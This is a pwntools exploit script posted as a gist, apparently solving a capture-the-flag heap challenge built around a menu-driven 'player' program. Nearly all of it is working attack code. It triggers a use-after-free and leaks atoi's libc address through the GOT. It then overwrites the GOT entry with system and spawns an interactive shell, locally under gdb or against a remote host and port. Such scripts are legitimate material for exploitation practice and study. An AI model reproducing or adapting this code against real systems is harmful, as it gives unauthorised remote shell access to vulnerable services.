@dqi
Created August 28, 2017 11:01
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# Terminal pwntools uses when gdb.debug() (see the __main__ block) spawns gdb.
context.terminal = ['mate-terminal','-e']
# gdb script passed to gdb.debug(): loads struct symbols from p_struct.o,
# breaks on show_player to dump the `selected`/`players` pointers and the
# player_struct they point at, continues, then breaks on edit_player.
# NOTE(review): `telescope` and `heap` are not stock gdb commands — this
# assumes a gdb plugin providing them is loaded; confirm before relying on it.
gdbargs = """
add-symbol-file p_struct.o 0
b show_player
commands
telescope &selected 13
heap
p *((struct player_struct*)*(&selected+0))
p *((struct player_struct*)*(&players+0))
c
end
b edit_player
c
"""
def add_player(r, name, a, d, s, p):
    """Drive menu option 1 on tube *r*: add a player.

    *name* is sent as-is; the four numeric fields *a*, *d*, *s*, *p* are
    sent as decimal strings, one per line. Blocks until the next
    ``'choice: '`` prompt has been consumed.
    """
    lines = ['1', name]
    lines.extend(str(stat) for stat in (a, d, s, p))
    for line in lines:
        r.sendline(line)
    r.recvuntil('choice: ')
def remove_player(r, idx):
    """Drive menu option 2 on tube *r*: remove the player at index *idx*.

    *idx* is sent as a decimal string. Blocks until the next ``'choice: '``
    prompt has been consumed.
    """
    for line in ('2', str(idx)):
        r.sendline(line)
    r.recvuntil('choice: ')
def select_player(r, idx):
    """Drive menu option 3 on tube *r*: select the player at index *idx*.

    *idx* is sent as a decimal string. Blocks until the next ``'choice: '``
    prompt has been consumed.
    """
    choice = '3'
    r.sendline(choice)
    r.sendline('%d' % idx if isinstance(idx, int) else str(idx))
    r.recvuntil('choice: ')
def edit_player(r, what, to):
    """Drive menu option 4 on tube *r*: edit one field of the selected player.

    *what* (the field selector) is sent as a decimal string; *to* is sent
    unchanged, so the caller controls its exact bytes. Blocks until the
    next ``'choice: '`` prompt has been consumed.
    """
    field = str(what)
    for line in ('4', field, to):
        r.sendline(line)
    r.recvuntil('choice: ')
def exploit(r):
    """Run the fixed interaction sequence against tube *r*.

    Adds three players, selects the first, removes all three, adds a fourth
    whose name embeds ``atoi_got``, reads the address printed after
    ``'Name: '`` as atoi's runtime address, rewrites field 1 of the selected
    player with the derived ``system`` address (the log message calls this
    the GOT write), then hands the session over with ``r.interactive()``.
    All addresses and offsets are hard-coded for one specific binary/libc
    build; this is Python 2 only (``str.encode('hex')``).
    """
    # GOT slot of atoi in the target binary (hard-coded, build-specific).
    atoi_got = 0x603110
    # Three players with cyclic() pattern names of 114/128/128 bytes.
    add_player(r, cyclic(114), 1, 2, 3, 4)
    add_player(r, cyclic(128), 5, 6, 7, 8)
    add_player(r, cyclic(128), 9, 10, 11, 12)
    # Select player 0, then remove every player that was just added.
    select_player(r, 0)
    remove_player(r, 0)
    remove_player(r, 1)
    remove_player(r, 2)
    # Fourth player: 16 pattern bytes followed by the packed GOT address.
    add_player(r, cyclic(16) + p64(atoi_got), 9, 10, 11, 12)
    # Menu option 5 prints the player; the bytes after 'Name: ' are reversed
    # (little-endian -> big-endian) and hex-decoded into an integer.
    r.sendline('5')
    r.recvuntil('Name: ')
    data = r.recvline().strip()[::-1]
    atoi_addr = int(data.encode('hex'), 16)  # Python 2 only
    log.success('atoi@libc: 0x%08x' % atoi_addr)
    # libc offsets of atoi and system for the target's libc build; the
    # commented-out pair is an alternative build's offsets.
    atoi = 0x00036e80
    system = 0x00045390
    # atoi = 0x00034b30
    # system = 0x00040dd0
    # Rebase: the distance between the two symbols is constant within one libc build.
    system_addr = atoi_addr + (system - atoi)
    # Edit field 1 of the currently selected player with the packed address.
    edit_player(r, 1, p64(system_addr))
    log.success('wrote system to got 0x%08x: 0x%08x' % (atoi_got, system_addr))
    # Two further menu prompts are consumed before the final input is sent.
    r.recvuntil('choice: ')
    r.recvuntil('choice: ')
    r.sendline('sh')
    log.success('Enjoy the shell!')
    r.interactive()
if __name__ == "__main__":
    # `sys` is not imported explicitly here; it is expected to arrive via
    # `from pwn import *` at the top of the file.
    if len(sys.argv) > 1:
        # Remote mode: argv[1] is the host, argv[2] the port (must be an int).
        log.info("REMOTE!\nHost: %s\nPort: %d" % (sys.argv[1], int(sys.argv[2])))
        r = remote(sys.argv[1], int(sys.argv[2]))
        exploit(r)
    else:
        # Local mode: launch ./main_patched under gdb with the `gdbargs`
        # script defined above; `exe=` names the binary for symbol lookup.
        r = gdb.debug(['./main_patched'], gdbargs, exe='main_patched')
        # r = process(['./main_patched'])
        # Python 2 print statement (pid of the debugged process).
        print util.proc.pidof(r)
        exploit(r)